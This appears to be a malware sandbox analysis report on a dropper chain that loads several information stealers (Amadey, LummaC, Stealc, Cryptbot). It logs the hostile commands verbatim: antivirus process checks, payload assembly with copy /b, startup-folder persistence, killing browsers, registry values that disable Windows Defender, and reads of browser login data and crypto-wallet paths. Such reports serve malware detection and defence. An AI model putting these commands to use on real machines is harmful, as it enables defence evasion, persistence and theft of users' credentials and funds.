Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: 3ee5495637.exe PID: 2848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3ee5495637.exe PID: 420, type: MEMORYSTR
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com NtReadFile: Direct from: 0x7FF6D8417D7F
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr NtQueryAttributesFile: Direct from: 0x7FF61837CE4E
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr NtProtectVirtualMemory: Direct from: 0x7FF61833B26C
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com NtProtectVirtualMemory: Direct from: 0x7FF6D8438FF0
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com NtClose: Direct from: 0x7FF6D8418693
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr NtQuerySystemInformation: Direct from: 0x7FF61837C4AD
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com NtQueryInformationToken: Direct from: 0x7FF6D84A3508
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr NtQueryAttributesFile: Direct from: 0x7FF61837D642
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com NtOpenFile: Direct from: 0x7FF6D848C37B
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr NtClose: Direct from: 0x7FF61837C5C7
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com NtProtectVirtualMemory: Direct from: 0x7FF6D844B26C
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr NtProtectVirtualMemory: Direct from: 0x7FF618328FF0
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr NtDelayExecution: Direct from: 0x7FF618311C92
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com NtQueryAttributesFile: Direct from: 0x7FF6D848D642
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com NtProtectVirtualMemory: Direct from: 0x7FF6D84183B5
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com NtWriteFile: Direct from: 0x7FF6D848B9D7
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com NtDelayExecution: Direct from: 0x7FF6D848DFD8
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com NtProtectVirtualMemory: Direct from: 0x7FF6D848C119
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com NtOpenFile: Direct from: 0x7FF6D848BF1E
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com NtClose: Direct from: 0x7FF6D848C3CD
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com NtQuerySystemInformation: Direct from: 0x7FF6D8434924
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com NtQuerySystemInformation: Direct from: 0x7FF6D848C4AD
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com NtQueryAttributesFile: Direct from: 0x7FF6D848CE4E
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr NtMapViewOfSection: Direct from: 0x7FF61837C508
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com NtClose: Direct from: 0x7FF6D848CE61
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr NtQuerySystemInformation: Direct from: 0x7FF618324924
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com NtDelayExecution: Direct from: 0x7FF6D8421C92
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com NtQueryAttributesFile: Direct from: 0x7FF6D848C1E1
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr NtQuerySystemInformation: Direct from: 0x7FFE221C26A1
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr NtProtectVirtualMemory: Direct from: 0x7FF6183083B5
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr NtQueryInformationToken: Direct from: 0x7FF618393508
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr NtUnmapViewOfSection: Direct from: 0x7FF61837C4BD
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com NtClose: Direct from: 0x7FF6D848C5C7
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com NtCreateFile: Direct from: 0x7FF6D841787C
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com NtSetInformationFile: Direct from: 0x7FF6D8417A79
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com NtClose: Direct from: 0x7FF6D848C200
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr NtClose: Direct from: 0x7FF61837FD06
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr NtDelayExecution: Direct from: 0x7FF61837DFD8
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr NtClose: Direct from: 0x7FF61837C37B
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com NtSetInformationFile: Direct from: 0x7FF6D8417A91
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com NtMapViewOfSection: Direct from: 0x7FF6D848C4BD
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com Memory written: C:\Users\user\AppData\Local\Temp\662510\Ryan.com base: 1F6E6E00000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr Memory written: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr base: 2629FA10000 value starts with: 4D5A
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com Thread register set: target process: 1640
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr Thread register set: target process: 6624
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe "C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe "C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe "C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe "C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe "C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe "C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe "C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Config Config.cmd && Config.cmd Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 662510 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Cameras + ..\Webmaster + ..\Contained + ..\More + ..\Wow + ..\Kg + ..\Love + ..\Parameter + ..\Dallas + ..\Falls + ..\Principal + ..\Tft + ..\Enabling + ..\Id + ..\Raise + ..\Tests + ..\Fw + ..\Dist + ..\Optimum + ..\Editor + ..\Lady + ..\William + ..\Myers + ..\Distribution + ..\All + ..\Republicans + ..\Candidates + ..\Blond + ..\Bermuda + ..\Tablets + ..\Defend + ..\Statement + ..\Streams + ..\Extensive + ..\Ecommerce + ..\Tourist + ..\Transsexual + ..\Participation + ..\Strange + ..\Remedy + ..\Thursday + ..\Client + ..\Courts + ..\Malta + ..\Mel + ..\Quantitative A Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\662510\Ryan.com Ryan.com A Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Feeling Feeling.cmd && Feeling.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768032
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Howard + ..\Los + ..\Become + ..\Mental + ..\Vermont + ..\Bt + ..\Vatican G
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\768032\Finish.com Finish.com G
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr "C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr" "C:\Users\user\AppData\Local\GuardTech Solutions\K"
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Process created: unknown unknown
Uses taskkill to terminate processes
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\cameras + ..\webmaster + ..\contained + ..\more + ..\wow + ..\kg + ..\love + ..\parameter + ..\dallas + ..\falls + ..\principal + ..\tft + ..\enabling + ..\id + ..\raise + ..\tests + ..\fw + ..\dist + ..\optimum + ..\editor + ..\lady + ..\william + ..\myers + ..\distribution + ..\all + ..\republicans + ..\candidates + ..\blond + ..\bermuda + ..\tablets + ..\defend + ..\statement + ..\streams + ..\extensive + ..\ecommerce + ..\tourist + ..\transsexual + ..\participation + ..\strange + ..\remedy + ..\thursday + ..\client + ..\courts + ..\malta + ..\mel + ..\quantitative a
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com Process created: C:\Windows\System32\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\lionguard.url" & echo url="c:\users\user\appdata\local\guardtech solutions\lionguard.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\lionguard.url" & exit
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\innosphere.url" & echo url="c:\users\user\appdata\local\innosphere dynamics\innosphere.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\innosphere.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\cameras + ..\webmaster + ..\contained + ..\more + ..\wow + ..\kg + ..\love + ..\parameter + ..\dallas + ..\falls + ..\principal + ..\tft + ..\enabling + ..\id + ..\raise + ..\tests + ..\fw + ..\dist + ..\optimum + ..\editor + ..\lady + ..\william + ..\myers + ..\distribution + ..\all + ..\republicans + ..\candidates + ..\blond + ..\bermuda + ..\tablets + ..\defend + ..\statement + ..\streams + ..\extensive + ..\ecommerce + ..\tourist + ..\transsexual + ..\participation + ..\strange + ..\remedy + ..\thursday + ..\client + ..\courts + ..\malta + ..\mel + ..\quantitative a Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com Process created: C:\Windows\System32\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\lionguard.url" & echo url="c:\users\user\appdata\local\guardtech solutions\lionguard.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\lionguard.url" & exit
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\innosphere.url" & echo url="c:\users\user\appdata\local\innosphere dynamics\innosphere.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\innosphere.url" & exit
Source: Ryan.com, 00000012.00000003.2651621159.000002095A15C000.00000004.00000001.00020000.00000000.sdmp, Ryan.com, 00000012.00000000.2640827400.00007FF6D84E8000.00000002.00000001.01000000.0000000C.sdmp, LionGuard.scr, 0000001E.00000000.2762180938.00007FF6183D8000.00000002.00000001.01000000.0000000F.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: skotes.exe, skotes.exe, 00000002.00000002.1759762042.0000000000883000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: .Program Manager
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Code function: 9_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 9_2_00406831
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Disable Windows Defender notifications (registry)
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
Disable Windows Defender real time protection (registry)
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1
Disables Windows Defender Tamper protection
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Registry value created: TamperProtection 0
Modifies windows update settings
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations
AV process strings found (often used to terminate AV products)
Source: 3907f97605.exe, 0000001F.00000003.3237931398.00000000014C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 0.2.file.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.skotes.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.skotes.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.1758282576.0000000000691000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1671475529.0000000004860000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1719275653.0000000004870000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1715277761.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2315217142.0000000005060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1759668971.0000000000691000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1717577963.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Credential Flusher
Source: Yara match File source: Process Memory Space: 04dc07bf76.exe PID: 2300, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 04dc07bf76.exe PID: 5160, type: MEMORYSTR
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: 3907f97605.exe PID: 7488, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 00000027.00000003.3061120785.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000003.3202171699.0000000005120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 3ee5495637.exe PID: 2848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3ee5495637.exe PID: 420, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Found many strings related to Crypto-Wallets (likely being stolen)
Source: 3907f97605.exe String found in binary or memory: Wallets/Electrum
Source: 3907f97605.exe, 0000001F.00000003.2880963508.00000000014D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: h\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"]J
Source: 3907f97605.exe String found in binary or memory: Jaxx Liberty
Source: 3907f97605.exe String found in binary or memory: window-state.json
Source: 3907f97605.exe String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: 3907f97605.exe String found in binary or memory: Wallets/Exodus
Source: 3907f97605.exe, 0000001F.00000003.3134050190.0000000001475000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Ethereum
Source: 3907f97605.exe String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: 3907f97605.exe String found in binary or memory: keystore
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
